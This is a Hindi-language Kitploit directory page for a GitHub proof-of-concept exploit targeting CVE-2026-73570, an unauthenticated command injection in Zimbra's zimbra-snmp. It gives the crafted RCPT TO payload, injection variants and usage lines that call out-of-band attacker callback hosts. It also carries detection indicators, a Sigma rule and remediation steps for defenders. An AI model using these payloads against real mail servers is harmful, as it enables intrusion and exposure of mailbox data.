Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/hainhc/cve-2026-73570
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगघटना प्रतिक्रियाईमेल सुरक्षा
GitHubhainhc/cve-2026-73570

CVE-2026-73570

CVE-2026-73570 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो zimbra-snmp लॉग इंजेक्शन के माध्यम से Zimbra Collaboration Suite में एक अनऑथेंटिकेटेड OS कमांड इंजेक्शन है, साथ में डिटेक्शन मार्गदर्शन।

रिपॉजिटरी देखें
12घं 26मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-73570 — Zimbra zimbra-snmp अनधिकृत OS कमांड इंजेक्शन PoC

CVE-2026-73570 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Zimbra Collaboration Suite < 10.1.20 में एक अनधिकृत OS कमांड इंजेक्शन (CWE-78, CVSS 8.9) है, जब zimbra-snmp पैकेज इंस्टॉल हो और SNMP नोटिफिकेशन सक्षम हों।

अस्वीकरण: यह PoC केवल अधिकृत सुरक्षा परीक्षण, रक्षात्मक शोध, और अपने स्वयं के सिस्टम के सत्यापन के लिए है। इसका उपयोग किसी ऐसे सिस्टम के विरुद्ध न करें जो आपके स्वामित्व में न हो या जिसके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति न हो।

भेद्यता तंत्र

Zimbra की SNMP नोटिफिकेशन सुविधा सेवा घटनाओं के लिए /var/log/zimbra.log की निगरानी करने हेतु swatchdog का उपयोग करती है। जब कोई लॉग लाइन इसके वॉच पैटर्न से मेल खाती है, तो मेल खाते टेक्स्ट को एक शेल कमांड में इंटरपोलेट किया जाता है जो SNMP नोटिफिकेशन भेजता है — बिना सैनिटाइज़ेशन के।

हमले की श्रृंखला:

root@kitploit:~
1. Attacker sends an SMTP session with a crafted RCPT TO address:

   RCPT TO:<"x: Service status change: localhost $(CMD)
            changed from stopped to running"@cve.invalid>

   The local part is an RFC 5321 quoted-string, so Postfix accepts the
   address syntax (spaces, colons, $(...) included).

2. Postfix rejects the recipient (relay denied / user unknown / sender
   restriction) and writes the FULL to=<...> string, quotes stripped, into
   /var/log/zimbra.log:

   NOQUEUE: reject: RCPT from unknown[x.x.x.x]: ... to=<x: Service status
   change: localhost $(CMD) changed from stopped to [email protected]> ...

3. swatchdog (zimbra-snmp) periodically scans the log and matches its
   watchfor pattern "Service status change ... changed from ... to ...".

4. The matched text is interpolated into the SNMP notification shell command
   -> $(CMD) is evaluated -> command execution as the `zimbra` user.

आवश्यकताएँ

लक्ष्य को निम्नलिखित सभी शर्तें पूरी करनी चाहिए:

  • Zimbra Collaboration < 10.1.20
  • zimbra-snmp पैकेज इंस्टॉल हो
  • SNMP नोटिफिकेशन सक्षम हों (zmlocalconfig | grep -i snmp_notify)

हमलावर पक्ष: Python 3 (केवल मानक लाइब्रेरी, कोई निर्भरता नहीं)।

उपयोग

root@kitploit:~
# 1. Verify RCE via out-of-band DNS callback (interactsh / Burp Collaborator):
python3 poc_cve_2026_73570.py -t mail.target.com --oob abc123.oast.site

# 2. Verify RCE via HTTP callback to your listener:
python3 poc_cve_2026_73570.py -t mail.target.com --oob http://10.0.0.5:8884/cb

# 3. Drop a marker file on the host (check manually on the server afterwards):
python3 poc_cve_2026_73570.py -t mail.target.com --cmd "touch /tmp/CVE-2026-73570_pwned"

# 4. Fingerprint only (no payload sent):
python3 poc_cve_2026_73570.py -t mail.target.com --check-only

# Debug: print the full SMTP transcript
python3 poc_cve_2026_73570.py -t mail.target.com --cmd "id" --debug

विकल्प:

फ़्लैगविवरण
-t, --targetलक्ष्य Zimbra SMTP IP/होस्टनाम (आवश्यक)
-p, --portSMTP पोर्ट (डिफ़ॉल्ट: 25)
--tlsSTARTTLS का उपयोग करें (जैसे पोर्ट 587)
--oobOOB DNS डोमेन या HTTP कॉलबैक URL (अनुशंसित)
--cmdOOB कॉलबैक के बजाय मनमाना कमांड
--fake-hostनकली Service status change स्ट्रिंग के अंदर होस्टनाम (डिफ़ॉल्ट: localhost)
--check-onlyकेवल फिंगरप्रिंट, कोई पेलोड न भेजें
--delayभेजने के बीच विलंब सेकंड में (डिफ़ॉल्ट: 1.0)
--debugपूरा SMTP ट्रांसक्रिप्ट प्रिंट करें

सत्यापन

स्क्रिप्ट प्रत्येक कमांड को कई इंजेक्शन वेरिएंट में भेजती है ($(...), बैकटिक्स, ;cmd;#, $({IFS}...))। प्रत्येक वेरिएंट के लिए, RCPT प्रतिक्रिया कोड देखें:

RCPT प्रतिक्रियाअर्थ
250, 450, 454 Relay access denied, 550 5.1.1 User unknownएड्रेस सिंटैक्स स्वीकृत — पूर्ण to=<...> स्ट्रिंग वाली रिजेक्ट लाइन अब लॉग में है। पेलोड रोपित।
501 5.1.3 Bad recipient address syntaxPostfix ने पार्स समय पर एड्रेस अस्वीकार कर दिया — कुछ भी उपयोगी लॉग नहीं हुआ। स्क्रिप्ट स्वचालित रूप से बिना कोट्स वाले फ़ॉलबैक के साथ पुनः प्रयास करती है।

फिर सर्वर पर पुष्टि करें (यदि आपके पास पहुँच है):

root@kitploit:~
# The injected line must be present:
grep 'Service status change' /var/log/zimbra.log | tail
# Expected: ... to=<x: Service status change: localhost $(...) changed from stopped to [email protected]> ...

# Wait 1-5 minutes (swatchdog scans the log periodically — execution is NOT real-time),
# then check for the effect:
ls -la /tmp/                    # if you used --cmd
# or watch your OOB listener for the callback

यदि लॉग लाइन मौजूद है लेकिन कमांड कभी निष्पादित नहीं होता, तो शेष पूर्व-शर्तें swatchdog पक्ष पर हैं: जाँचें कि प्रक्रिया चल रही है (ps aux | grep swatch) और उसका कॉन्फ़िगरेशन वास्तव में Service status change पैटर्न की निगरानी करता है।

निष्पादन संदर्भ: कमांड zimbra उपयोगकर्ता के रूप में चलते हैं (root के रूप में नहीं)।

समस्या निवारण

  • कोई लॉग लाइन नहीं: आपका स्रोत IP संभवतः अवरुद्ध है (बार-बार विकृत प्रयासों के बाद fail2ban, या फ़ायरवॉल)। जाँचें fail2ban-client status, iptables -L -n | grep <your_ip>, और पुष्टि करें कि पैकेट Postfix तक पहुँचते हैं tcpdump -i any port 25 and host <your_ip> -nn -A के साथ।
  • बहुत संकीर्ण grep: विकृत एड्रेस NOQUEUE: reject लाइन के बजाय warning: Illegal address syntax ... in RCPT command: ... के रूप में लॉग होते हैं। इसके बजाय अपने हमलावर IP से grep करें।
  • निष्पादन विलंब: swatchdog एक चक्र पर लॉग को पोल करता है — विफलता का निष्कर्ष निकालने से पहले 1–5 मिनट प्रतीक्षा करें।

पहचान (रक्षकों के लिए)

सफल शोषण के प्रमुख संकेतक:

  1. लॉग आर्टिफैक्ट (प्रयास): /var/log/zimbra.log में Postfix रिजेक्ट लाइन के अंदर to=<*: Service status change: *$(...)* — लगभग शून्य गलत सकारात्मक, क्योंकि Service status change टेक्स्ट कभी भी वैध रूप से to=<> एड्रेस के अंदर नहीं आता।
  2. प्रक्रिया ट्री (उच्च विश्वसनीयता): कोई भी शेल या कमांड इंटरप्रेटर (sh, bash, curl, wget, nc, python, perl) जो swatchdog / swatch की चाइल्ड के रूप में स्पॉन हुआ हो।
  3. पोस्ट-एक्सप्लॉइटेशन: /opt/zimbra/jetty/webapps/ या /opt/zimbra/jetty_base/webapps/ के अंतर्गत नई .jsp/.jspx फ़ाइलें, /tmp/ में अप्रत्याशित फ़ाइलें, zimbra उपयोगकर्ता के लिए नई cron प्रविष्टियाँ या SSH कुंजियाँ, और मेल सर्वर से आउटबाउंड कनेक्शन जो सामान्य मेल प्रवाह से मेल नहीं खाते।

उदाहरण Sigma नियम (प्रयास चरण):

root@kitploit:~
title: Zimbra SNMP Notification Log Injection Attempt - CVE-2026-73570
logsource:
  product: linux
  service: postfix
detection:
  sel:
    - 'to=<*: Service status change: *$(*'
    - 'to=<*: Service status change: *`*'
  condition: sel
level: high
tags:
  - attack.initial-access
  - attack.t1190
  - cve.2026.73570

उपचार

  • Zimbra Collaboration को 10.1.20 या बाद के संस्करण में अपग्रेड करें।
  • यदि तत्काल अपग्रेड असंभव है: SNMP नोटिफिकेशन अक्षम करें और पैच होने तक zimbra-snmp पैकेज को रोकने/हटाने पर विचार करें।
  • यह CVE पुष्ट सक्रिय शोषण के साथ CISA KEV में सूचीबद्ध है — किसी भी पूर्व में भेद्य सिस्टम पर कम से कम 30 दिनों के लॉग की पिछली जाँच करें, और किसी भी पुष्ट समझौते को पूर्ण मेलबॉक्स डेटा एक्सपोज़र मानें।

संदर्भ

  • Zimbra Security Advisories (vendor): https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
  • Zimbra 10.1.20 patch release (fix): https://blog.zimbra.com/2026/07/patch-release-update-zimbra-10-1-20/
  • NVD — CVE-2026-73570: https://nvd.nist.gov/vuln/detail/CVE-2026-73570
  • CISA Known Exploited Vulnerabilities Catalog (added 2026-08-21): https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search=CVE-2026-73570
  • CISA alert — "CISA Adds One Known Exploited Vulnerability to Catalog": https://www.cisa.gov/news-events/alerts/2026/08/21/cisa-adds-one-known-exploited-vulnerability-catalog
  • CERT Polska advisory 145/2026 (active exploitation + IoC guidance, 2026-08-17): https://moje.cert.pl/komunikaty/2026/145/aktywnie-wykorzystywana-podatnosc-w-zimbra-collaboration-suite/
  • BleepingComputer — "Critical Zimbra RCE flaw now actively exploited in attacks": https://www.bleepingcomputer.com/news/security/critical-zimbra-rce-flaw-now-actively-exploited-in-attacks/
  • Help Net Security — "Unpatched Zimbra servers are falling to CVE-2026-73570 attacks": https://www.helpnetsecurity.com/2026/08/25/zimbra-cve-2026-73570-compromised/
टूल डाउनलोड करें